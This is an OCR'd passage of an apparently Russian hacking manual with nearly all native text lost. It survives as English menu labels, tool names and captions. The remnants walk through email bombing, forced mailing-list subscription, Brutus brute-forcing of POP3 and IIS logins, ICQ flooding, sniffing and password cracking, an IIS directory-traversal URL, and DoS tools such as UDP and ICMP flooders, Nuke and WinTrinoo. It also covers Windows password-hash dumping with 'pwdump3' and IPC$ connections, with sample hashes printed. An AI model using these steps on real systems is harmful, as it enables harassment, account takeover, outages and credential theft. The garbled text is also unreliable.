SMTP- Random Server List ( ) . Submit (). Size of Bomb ( ) (. 6.1) : # of messages to send ( ) . 10. Never ending bomb ( ) .


Puc. 6.5. MIME

13 , DnD , . , , . , Clone () E-Mail bomb ( ) Bomber Spawn 1 ( ), . 6.6.-a Bomber Spawn 1 Sendbombto: Say bomb is from: Message Subject:


Puc. 6.6. 88

, Bomber Spawn 1 ( ) E-Mail bomb ( ) - SMTP-. , SMTP-. - - , ! - . , , ( - ). > , DnD Clones Load Multi Clones ( * ). Number of clones ( ), . 6.7Number of clones How many clones do you want to load?


Puc. 6.7. - ! > Number of clones ( ) ( 5-6) . Bomber Spawn ( ), 1 - . Send Bomb ( ) . - !

&& ! , - , 89

! DnD , , Mailing lists ( ). Subscribe joe lamer to mailing list ( ), . 6.8, , Euro Queer ( ), Mormons (), Family Medicine ( ) - !*i Subscribe joe lamei to a mailing list!


Puc. 6.8. DnD DnD . Target Email Address ( ), Subscribe em () - . , .

, , DnD , , , . , Extras Pword generator ( * ). Randomic Password Generator ( ), . 6.9. , How many characters? ( ?) ( - 8 ) : Use Both ( ) - , Use numbers ( ) - 90

Use letters ( ) - . - , , .* Randomic Passwoid Geneialor


Extras () - . 6.9. SMTP- ( SMTP Remote ( SMTP)), ( Raw Port ( )). , ( , SMTP). Other Tools ( ) . - , , . , - ; . , , . , ( ). , .


. , , - ( IMAP) , . - . Brutus Authentication Engine Test 2 ( Brutas , 2), Brutus AET2 (http://www.hobie.net/brutus). . 6.10 Brutus, , FTP, HTTP, Telnet NetBus.91


Puc. 6.10. Brutus


, Brutus ( 8 Brutus IIS). , alex-1 .sword.net, kolia. , , - , . . > Brutus - 2 (. 6.10) Target () , alex-1.sword.net. > () , . > Connection Options ( ) Use Proxy ( ), - . > Authentication Options ( ) Single User ( ) - .


User file ( ) , .. - kolia. > Pass Mode ( ) Brute Force ( ). Brutus , . 6.11.X Biutus - 2 - www.hoobie.net/biuluit - (January 2000J File Tool. Help Type|POP3 [ | | Start | Slop | Clear | T


Puc. 6.11. Brutus POPS Range (). Range () Brutus - Brute Force Generation (Brutus - ), . 6.12.Biutus - Biule Foice Generation Digits only Lowercase Alpha Uppercase Alpha Mixed Alpha Alphanumeric Full Keyspace Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! | Min Length [ Max Length [4 [T Cancel

Puc. 6.12.


Brutus - Brute Force Generation (Brutus - ) - , , . , - , Min Length ( ) 3, Max Length ( ) - 4. , Digits only ( ). . > Start () Brutus - 2 Brutus - 2. . 6.13.X Uiutus - 2 - www.hoobie.net/biutus - [Januaiy 2000J File Took Help Type|POP3 EJ | Start | Stop | Clear |


Puc. 6.13. 1. Positive Authentication Results ( ) , kolia - 0007. , Brutus 10997 alex-1.sword.net ( 11000). 5 Pentium 3 1000 , Ethernet 10 /. , , Brutus (


). -, , , ( 8 !), , (, &$ ..). ! Brutus - Brute Force Generation (Brutus - ) 8 , Full Keyspace ( ). Start () Brutus - 2 - 6 095 689 385 410 816 - , ! 12 ? , , , (., , [10]). Brutus, Pass Mode ( ). ( 100 000), , . , password, parol, MyPassword - Web- - . -, , , Ethernet, 30-50 / ( ). - . - , - , , , . . , , , , , . . - , .


IIS Brutus 8 , - . , , . , , , - , - ! : !. .

, , , . 1, , , , . - , , , , . , - ( - ), . , - , . . , TFTP 1-1 , 1-1 . , TFTP , . TFTP , , , . , , , , , . . , ,96

( ) . , , , Web- - .. ( , ). . - , , , -. . - , .. , - , , . , .. , - - . , 2002 ., , , . Web-. . . ... ( ). Web-, , ?, . , , ?, ?, ? . - , , , , . , , , , , . , , - , , repa_parenaia, - !

- . , , , , . 974 - 5830

- , , , - , . . , - . , . , ( ) , - ! . , 8 ( 12) , , . , DnD . . , - , Norton Antivirus MacAfee VirusScan. , - PGP Desktop Security. , . , - , , , . - - , .


7.

ICQ ICQ Intelligent Call Query, . ICQ [--] : I Seek You - ; , ICQ . ICQ , 1998 Mirabilis, ( 40 ) AOL. ICQ , ICQ , , . , , ICQ, , . , , - . ICQ , ICQ. ICQ , ICQ, , http://www.ICQ.com, http://mira-bilis.com. ICQ - ICQ , , 1998,1999, 2000, 2002, ICQ 2003. ICQ UDP, 4000, - TCP, . , ICQ, UIN (Unique Identification Number - ). UTN - ICQ , . , ICQ? ICQ , . , ? .

-, ICQ, . -, ICQ ICQ . , ICQ, : , UIN , , . , ICQ , - ICQ . , , - . ICQ-, , IP- ICQ-, , . , , DoS, 9 . , IP- ICQ, - , ICQ- . ! , ICQ-, . , , , - , . ICQ, Mirabilis . ICQ, ICQ , . , .


ICQ

ICQ . - , ICQ ICQ ICQ. , ICQ ; , ICQ- (, LameToy www.mirabilis.com). , ( ) , . , , , , , . , ICQ. . . Sword-2000 ICQ Groupware Server, Alex- ICQ Groupware Client, UESf, 1001, 1-1 , UIN, 1003. ICQ Groupware http://www.icq.com. ICQ, ICQ Groupware, , , 1. - , ICQ - , ICQ . ICQ ICQ-, ICQ-, ICQ- .


UIN ICQ- UIN ICQ, , UIN . UIN . , , - . - - , . , , . ( ) LameToy for ICQ (DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , . LameToy for ICQ. . 7.1 , LameToy for ICQ.LameToy For Icq [DBKILLER] | Send [ Losei-


Puc. 7.1. LameToy for ICQ (DBKILLER) ICQ LameToy for ICQ (DBKILLER) - Send (). , Setting () Loop () , . UIN, UIN# - Ran (Random - 102

ICQ ). , , , , . , ICQ-, - , UIN UIN . , ICQ (ICQ99a ICQ99b) . DB- ( - ), DB Data Base - , , DB NewDB. LameToy , DB killer ( DB) Setting (). ICQ, . , , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker .

lf~ac)peca ICQ- DoS ( ) , - . , , , Advanced ICQ IP Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml). . 7.2 Advanced ICQ IP Sniffer.Advanced ICQ IP SnifferYour UIN: [207685174 | Password: IJ Clear list Timeout. Tiy again. Saver


Puc. 7.2. - IP- ICQ


IP- ICQ UIN, Advanced ICQ IP Sniffer ICQ, UIN . , , Your UIN ( UIN) Password () Advanced ICQ IP Sniffer ( ICQ). Check () , ICQ UTN , Info () . , Info () . 7.2 , ( ) IP- ICQ, TCP-, ICQ . , , Ext IP ( ), Int IP ( IP) TCP Port ( TCP). , ICQ- ( ). ICQ, Advanced IP ICQ Sniffer, ICQ server's address and port ( ICQ), Server () . 7.3.ICQ server's address and portAddress: licq.rnirdbilis.com Port: [4000 |


ICQ server's address and port ( ICQ) Mirabilis ICQ 4000. , / IP- / .

. 7.. ICQ server's address and port ( ICQ)

ICQ, , , ICQ-, ICQ- ICQ. , , . , ICQ, ICQ-MultiWar (http://www.paybackproductions.com/), - ICQ Flooder (. 7.4).


Puc. 7.4. ICQ ICQ Flooder, . > Victim's address ( ) IP- ICQ. > ICQ-port ( ICQ) TCP. > , UIN . : UTN - Randomly generated UIN ( UIN), UIN UIN. UIN - Apparent source UIN ( UIN ) UIN, ICQ . > No. of Messages ( ) ICQ-. > Message () (- , ). > Send! () . - , ICQ, , - , , 105

http://mht.hut.ru/icq/icq.html, ( , , ICQ , ). ICQ - , , , - !

ICQ ICQ, ICQ, , . , , . , , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.OICO SubMachineGun vl.4 by uD File Settings About [ Bruteforce ] [... [ 13 Single [~~] Single About Agent Force!


Puc. 7.5. ICQ subMachineGun U1N ICQ


ICQ brute force - , , . . ICQ ICQ subMachineGun . > ICQ subMachineGun. > Settings * Connections&Cracking (&). , . 7.6.icq server [ Cracking ] 13 Stop if successful... Make log of cracked uins 0 Reconnect if timeout 0 Cut passwds length to 8 digits set timeout: relogln ; times port


Puc. 7.6. U1N icq server ( ICQ) ICQ, , ICQLmirabilis.server. port () 4000. Cracking () : Stop if successful ( ) ICQ. Make log if cracked uins ( UIN) ICQ.107

Reconnect if timeout ( ) ICQ . Cut password length to 8 digits ( 8- ) 8- . > set timeout ( ) 15 . > relogin ( ) ICQ 3. ICQ subMachineGun UIN . . > ICQ subMachineGun Bruteforce ( ) UIN. . Single () UIN, . Single () UIN. UIN, (...) Making victims list ( ), . 7.7. Making victims list ( ) Range () , , UIN ( - 100000) ( 900900).


Puc. 7.7. UIN

step () UIN ( - 100). Generate () UIN; .


ICQ , Generate () - UIN, , , .. Add () UIN . > UIN, Open () UIN ( UIN ). > - UIN , t0*"!. Clear () UIN ( ). UIN, . . > ICQ subMachineGun Bruteforce ( ) . . Single () , . Single () . > , (...) Make passlist ( ), . 7.8. Make passlist ( ) . > Open () ( ). - , ICQ.


Puc. 7.8.

v Generator () Add (). , .109

> , 0 *"**]. Clear () ( ). > , . . Force (). , ICQ subMachineGun v1.4 (. 7.9).OICQ SubMachineGun vl 4 by uD File Settings About


Puc. 7.9. - ICQ subMachineGun v1.4, UIN, ( , . 7.9 ). , , 15 , ICQ. - 45 , ( ). , , , , , .. - . ...110

ICQ

( -, , ICQ - . ICQ , ICQ . , ? - ! , ? , ICQ- , . , . ? , Windows. , . , ICQ , ICQ. ICQ-, , ElcomSoft Advanced ICQ Password Recovery (http://www.elcomsoft.com). , . . 7.10 Advanced ICQ Password Recovery.


Puc. 7.10. ICQ .dat ICQ, Advanced ICQ Password Recovery ( ICQ) .dat, ICQ.111

, , ICQ 2002 2002. 2002 , UIN .dat, .., , 207685174.dat (207685174 - UIN ). ICQ Password successfully found! ( ICQ ), (. 7.11).ICQ Password successfully found ! ICQ version: 99b-2000b UIN password:


Puc. 7.11. !

. 7.11, ICQ 99b - 2000b, ICQ 2002 ( ). , ICQ , - , - ICQ-. - , , (. [11]), Web- (. 8). , , , .

, ICQ ( ) , . , , , ICQ. , , ICQ - , - . , . ICQ, . . , , ICQ- - ICQ . , ICQ , UIN . - 112

ICQ ? , , , - , . , , - , , , , , , - . ICQ - , , , , , , , , . - , .. ICQ, , , . , ICQ ICQ, ICQ ( , ICQ Team (http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ. - , . , ? , , . , - , ? , ... , , , . ICQ-, - , .

ICQ , . ICQ - ,


ICQ-. ICQ DoS ... . ICQ . -, , ICQ-, ICQ-, ICQ- . ICQ, ICQ. IP- , , ICQ. ICQ . , ICQ-, UTN . , ICQ-, -, , BlacklCE Defender, DoS. - , , . , . , ICQ - . -, - ICQ, ICQ. , IP- ICQ-, - . , . , . ICQ , PGP Desktop Security 2.9, ICQ- . , PGP- ( [7]).


8.

Web-caumoft Web? , Web , . Web- , Web- . , , , . , Web- , , , , . HTML Web- ( - ), , . HTML . ( ). , Web-, , Web-, , . HTTP, , , . Web-, , . , Web-, DoS , , Yahoo. , Web-, , ( ) Web- , . Web , .

Web~cauma Web Web , , Web, Web,

, . -

Web - Web, Web . Web - , Web, Web . Web , . Web - Web, , Internet Explorer (ffi), - HTML Web-, HTTP, Web. Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation . Web, ASP (Active Server Page - ) CGI, , Java SUN, Apache Software Foundation . Web, Web, , . SQL Microsoft, Oracle Oracle . , , , - ODBC (Open Data Base Connectivity - ). - , , , , , ... ?

1 Web~cauma , Web-, . , .


Web- Web- - , , , , , Web . Web- - Web- , , TCP- 80, , Web-, ( CVE, Web-), Web- - . Web - - ASP, Java, CGI - , . Web - , -, , -, ( !). , , - . , , (cookie), , . - Web- , , . , , CGI- , - CGI- , , , . - , Web- , . - , Web- , , , - . - , , , Web-, Web-, . , (, . []). , , , , IIS 5. , 117

( HTTP), CGI- ( ) Web ( Web). Web- , . IIS , Web-, . , Web- , - , . - , Web-. - . , FTP- , , . , . Web- .

Web~cauma , Web-, . , , , , . , , . , Web- , - , , DNS-, . Web. , .


Web-

cbp Web- . . -, , - , . IP-, , , . Whols . -, HTML- Web- . HTML , Web, , . , , , , JavaScript . , HTML- Web Web- Teleport Pro. , , Whols - , , Web. whois ( Unix), Web- , whois Web-.

Whols . , , . 1999 - Network Solution (http://www.networksolution.com), , , InterNic (http://www.internic.net). / . Web-, Whois ( ), . Whois , ,


, DNS . , RIPE NCC (Network Coordinate Center - ), IP- . Web- RIPE NCC (http://www.ripe.net), . 8.1.t @ T 1 Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^^ El ^ |

. 8.1. Web- RIPE NCC IP- Web- ? - - DNS - .

, SuperScan (http://www.foundstone.com), . 8.2. SuperScan, . > Start () - . > Stop () . > Scan type ( ) All list ports from ( ). > Start ().


. 8.2. SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. ( ), .


. 8.. IIS 5121

Legion (http://packetstormsecurity.org/ groups/rhinoS), - 1.0.0.1 . 8.3. , - IIS 5, - , ? .

II5 | IIS , HTTP (Hypertext Transfer Protocol - ) CGI (Common Gateway Interface - ), IIS, . HTTP , , [12], - Web . HTTP , GET. Web- (, ), GET, , , http://www.anyserver.com/documents/order.html. order.html /documents IIS, c:\inetpub\wwwroot\documents. CGI , , [12], . HTTP, : http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2 MyScript - , /scripts IIS, a ?1+2 , MyScript. IIS , , , . CGI, ASP (Active Server Pages - ) ISAPI (Internet Server Programming Interface - ). ASP : http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2= 2


Web- MyScript.asp, , , HTML. ISAPI , ISAPI. HTTP: http://www.anysite.com/isapi.111?1&2 , IIS, , .

HTTP , IIS . IIS 2.0 :

http://www.anysite.eom/.7.7.7.7.7winnt/secret.file Web- , secret.txt. - Windows, ACL. IIS , Web- [3]. IIS , , , , , SecurityLab.ru (http://www.securitylab.ru). IIS, netcat (http://www.atstake.com), (netcat - - [3] netcat IIS). netcat Sword-2000 , . netcat . > Alex- netcat, nc -vv 1.0.0.1 80. v GET / HTTP/ 1.0 111. . 8.4. GET / HTTP/1.0 IIS. . 8.4, HTML, .


Command Prompt
c:\test\netcat>nc -vv 1.0.0.1 80
DNS fwd/rev mismatch: SWORD-2000 != sword-2000.sword.net
SWORD-2000 [1.0.0.1] 80 open
GET / HTTP /1.0

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 28 Feb 2003 12:55:40 GMT
Content-Type: text/html
Content-Length: 87

itml>ErrorThe parameter
sent 17, rcvd 224: NOTSOCK
C:\test\netcat>

Puc. 8.4. GET IIS netcat , GET Start () Brutus - 2 (. 8.20) . Brutus - 2 . 8.22.


Puc. 8.22. IIS ! , IIS , . 8.23, , .

Puc. 8.23. Web , Brutus , Web. CGI- Web-. () HTTP (Form) (HTTP ()) GET ,


, , , .

Web, , - . Web , . , , . , Windows NT/95/98, Web- CGI Vulnerability Scan D@MNED CGI Scanner 2.1, , , Web, , . , Web-, , , . Web - , Web- . , Web- - , Retina, , , [7]. Web- - , .


9.

UoS , TCP/IP, TCP/IP , . , , - , DoS (Denial of Service ). DoS -, TCP/IP . DoS , . DoS , , Yahoo, eBay, CNN.com, www.Microsoft.com, , [3]. , - , , , . DoS , , , , . , [3], DoS , . , , , , DoS Web-; , DoS . , , - , DoS. , DoS , . DoS , , , , - - IDS (, BlacklCE Defender (http://blackice.iss.net/)), .

DoS, , .

' DoS , . , , DoS . - , , , ( Web- Yahoo). . , , 1 ( 1544 /), , , 56 / ( ). - , , , . . - , . - , , . - , . , . - , , . . DoS , , .


DoS

, . 1, Web- [3], , . , , . , . , - UDP ICMP. DoS, , , /. .

, UDP UDP, . , DoS, UDP Flooder 2.0 Foundstone (http://www.foundstone.com), , - , . . 9.1 UDP Flooder 2.O. UDP Flooder 2.0, DoS 1-3 IP- 1.0.0.5 . > UDP Flooder 2.O. IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5. > Port () , 80, HTTP-.


Puc. 9.1. UDP Speed () LAN, . Data () Random ( ), - FileWindows Task Manager Opliont View Help Applications | Processes J Performance | Nettvi^ing [ . Sword > , , 20 000 30 000, . > Go (). > , , Stop (). . 9.2 Alex- , Networking ().146Adapter Name I Network Utilization I Link Speed I 10 Mbps


Puc. 9.2. 80%

DoS , - UDP, 50% . - , LAN Ethernet I DBase.

4>) ICMP ( ) ICMP (Internet Control Message Protocol - ) UDP. . 9.3 X-Script ICMP Bomber.pt ICMP Bomber vO 3 By Code Host |1.0.0.5 Packet Size: h ooOOO \ NumberToSenchhooo


. 9.. X-Script ICMP Bomber , , Host () IP- , Ping (). , Packet Size ( ) , Number to Send ( ) . - . . 9.4 , Alex- ( IP- , , 1.0.0.5). ICMP , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP . ICMP , Web-; ICMP .


Puc. 9.4. DoS !

Aht3K3 Smurf , , , DoS ? Smurf, . , , Smurf . ECHO () ICMP, . IP- , . , , - 10 , . , DoS, DDoS (Distributed DoS). DDoS -, . , ,


DoS DoS . DDoS WinTrinoo ( http://www.bindview.com), , , DDoS Win32. 2000 DDoS , Web- (, , , WinTrinoo). - Foundstone , , DoS.

DoS, , , , , . , , DoS, , . , . DoS PortFuck, ( TCP- , ). PortFuck - TCP- , . , , , TCP- , , , . . 9.5 PortFuck.! f PortFuck 1.02 PRIVATE BUILD .: Host: localhost Port: ] | START


Puc. 9.5. PortFuck 149

Nuke Nuke , DoS, , , -, . - , . TCP/IP ICMP, ICMP . - - , .. - ICMP, , , . , . - - , , , , . Web-, , . Nuke - . DoS Nuke , , Windows 2000/XP , Windows 9x. Windows 2000/XP, (, [4]). , Windows 9x, , . , . Nuke - , . , Windows Nuke'eM version 1.1, . 9.8. Nuke , - Alex-2, IP- 1.0.0.4 Windows 95. . > Address () Windows Nuke'eM version 1.1, . 9.8, IP- Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000). - Add () .152


Puc. 9.8. > Execute (). Windows Nuke'eM version 1.1 (. 9.9).Windows Nuke'eM - Version 1 . 1Rle


Puc. 9.9. Alex-2 ! > Alex-2, 1-2 Windows. Windows , . 9.10. , 1-2 - Nuke. , IRC- IP-. Windows , , , IDS ( BlacklCE Defender).


- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable: Datagram Too Big ( : ). , ICMP DoS , , , , , , . , , DoS, TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP- NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send. , nbname - , nbname, , nbname.

DoS - , . , , , . , [11] , , DoS, , , Web- . , Web-. - , DoS. DDoS - , , , , ,


DoS -. , Foundstone. , , .. , 1 , Foundstone . DDoS, , Foundstone . Foundstone, (Robin Keir), http://www.foundstone.com DDoSPing 2.0, -. , UDP, UDP . . 9.11 DDosPing 2.0, .-Target IP address range Start IP address End IP address |1.Q.Q.5| h.OO 5 -Transmission speed controlSpeed (pkts/sec)I 181 I


. 9.11. DDoS DDoSPing 2.0 . > Start IP address ( IP-) End IP-address ( -) IP- .157

> Speed () , , LAN. > , Configuration () . 9.12).


. 9.12. > , Windows defaults (Windows ) Unix defaults (Unix ), Windows Unix, . > , DDoSPing 2.0 , WinTrinoo, , - StachelDraht Tribe Flood Network. , (. 9.12). > DDoSPing 2.0 . 9.11 Start () . Infected Hosts ( ). , - Zombie Zapper (http://razor.bindview.com/tools/ ZombieZapper__form.shtml), WinTrinoo. . 9.13 , , , DDoSPing 2.O.158


Puc. 9.13. Zombie Zapper DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.

, , , DoS - , , 1 . , , - , , - Web- - . - , , , , , . DoS , - (-, , ) Web-. IP- ICMP-! EDS DP-, , , , Web. , - , . DoS , - - !159

10.

Windows ZOOO/Xf, , - () , , - , ( , , [1]). , , , - - . , . ? TCP/IP, . TCP/IP . . 1 , . - , , [11]. , , , . 1, , - .

cemu*TCf/lf IP- , ping , W2RK (Windows 2000 Resource Pack). - ICMP (Internet Control Message Protocol - ). . . 10.1 ping Sword-2000.

Windows 2000/XP \ Command Prompt

Pinging 1.Q.O.I with 32 bytes of data: Reply Reply Reply Reply fron fron fron fron 1.0.0.1: 1.0.0.1: 1.0.0.1: 1.0.0.1: bytes=32 bytes=32 bytes=32 bytes=32 tinenbtst

Sviord: Node Ipflddress: 11..0.5] Scope Id: I I NetBIOS Remote Machine Nane Table

SUORD-20QQ SUORD-2Q00 SUORD SUORD SUORD SUORD SWORD-20QGI SUORD MSBROUSE_ INef"Seruices IS-SUORD-2000. flDMINISlllfllOR 52-54-flB-14-S5-B4

Registered Registered Registered Registered Registered Registered Registere Registerei Registered Registered

Puc. 10.4. Sword-2000 , Administrator Sword-2000 CD-ROM. , - NetBIOS, Administrator, 7, 9, 13, 17, 139, 443, 1025, 1027 , :. Administrator - : .


Windows 2000/XP , pwdump3.exe Windows NT/2000/XP LC4 . , NetBIOS TCP/IP ( Windows 2000/XP )? , , SNMP (Simple Network Management Protocol - ), Windows NT/2000/XP. , SNMP, , , [11]. , , , .

Windows NT/2000/XP . , . , , , . - , ..

, . nbtstat MIB, - , (. [3] [4]). , , . , . D:\>net use \\1.0.0.1\1$ * /u:Administrator * , IPC$ Administrator. : Type password for \\1.0.0.1\IPC$: . , - 165

, , , . , , , SMBGrind, CyberCop Scanner Network Associates. ( [3]). - . , , , . Windows NT/2000/XP , SAM (Security Account Manager - ). SAM (, , ) , , , . , - , , , , . , SAM, LC4 ( LOphtcrack, - LC4) (http://www.atstake.com/research/redirect.html), . Samdump - SAM. Pwdump - , . Syskey SAM ( Syskey . 2). Pwdump2 - , Syskey. . Pwdump3 - , Pwdump2, . Syskey, 2; , SAM, Windows 2000/XP , Windows NT . 2 , , , . Sword-2000 PwdimpS, : C:\>pwdump3 sword-2000 > password.psw


Windows 2000/XP Sword-2000, password.psw. (Notepad) (. 10.5).sword.psw - Notepad File Edit Format Help \dministator: SOO:7A01665EB2B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FO A::: Guest:501 :NO PASSWORD*"' :NO PASSWORD * ::: krbtgt:S02:NO PASSWORD ' :7BD70B6AF1C3909E006426SFE207B256::: Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;:: Alex-1:1113:7A01665EB2EB